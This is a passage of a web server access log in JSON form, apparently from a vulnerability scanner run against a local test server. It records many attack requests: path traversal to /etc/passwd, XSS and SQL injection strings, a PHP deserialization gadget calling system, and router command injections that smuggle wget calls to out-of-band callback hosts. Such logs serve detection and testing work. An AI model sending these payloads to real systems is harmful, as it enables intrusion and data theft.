(KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ads/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v2/application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80?@example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"{ \x22link\x22: [ { \x22value\x22: \x22link\x22, \x22options\x22: \x22O:24:\x5C\x22GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5C\x22:2:{s:33:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5Cu0000methods\x5C\x22;a:1:{s:5:\x5C\x22close\x5C\x22;a:2:{i:0;O:23:\x5C\x22GuzzleHttp\x5C\x5CHandlerStack\x5C\x22:3:{s:32:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000handler\x5C\x22;s:2:\x5C\x22id\x5C\x22;s:30:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000stack\x5C\x22;a:1:{i:0;a:1:{i:0;s:6:\x5C\x22system\x5C\x22;}}s:31:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000cached\x5C\x22;b:0;}i:1;s:7:\x5C\x22resolve\x5C\x22;}}s:9:\x5C\x22_fn_close\x5C\x22;a:2:{i:0;r:4;i:1;s:7:\x5C\x22resolve\x5C\x22;}}\x22 } ], \x22_links\x22: { \x22type\x22: { \x22href\x22: \x22http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\x22 } } }","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /node/1?_format=hal_json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?layout=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://ca286t0smpvbatig07h09psj8ed4zhpsd.oast.online&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /goform/setmac HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1/index.htmlr", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/cipher.aes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448 HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"{\x22contentId\x22:\x22786457\x22,\x22macro\x22:{\x22name\x22:\x22widget\x22,\x22body\x22:\x22\x22,\x22params\x22:{\x22url\x22:\x22https://www.viddler.com/v/23464dc5\x22,\x22width\x22:\x221000\x22,\x22height\x22:\x221000\x22,\x22_template\x22:\x22../web.xml\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/tinymce/1/macro/preview HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /virtualems/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php/'%3E%3Csvg/onload=alert%6029KAnpSr7o3Ez7zNOBxpi5CbUCA%60%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"page=index');${system('echo lotuscms_rce | md5sum')};#\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adserve/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/submissions HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /concrete5/index.php/install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hedwig.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'` HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /VirtualEms/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /systemstatus.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /en-US/splunkd/__raw/services/server/info/server-info?output_mode=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /airflow.cfg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"page=index');${system('echo lotuscms_rce | md5sum')};#\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lcms/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wp_nlm=confirmation&appurl=aHR0cDovL2F0dGFja2VyLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adserver/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS /api/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"target_addr=\x221.1.1.1+`wget+http%3A%2F%2Fca286t0smpvbatig07h0t1kk4p4ixsuei.oast.online%2F`\x22&waninf=127.0.0.1\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boaform/admin/formTracert HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1/diag_ping_admin_en.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /te%3Cimg%20src=x%20onerror=alert(42)%3Est HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/dam/merge/metadata.html?path=/etc&.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 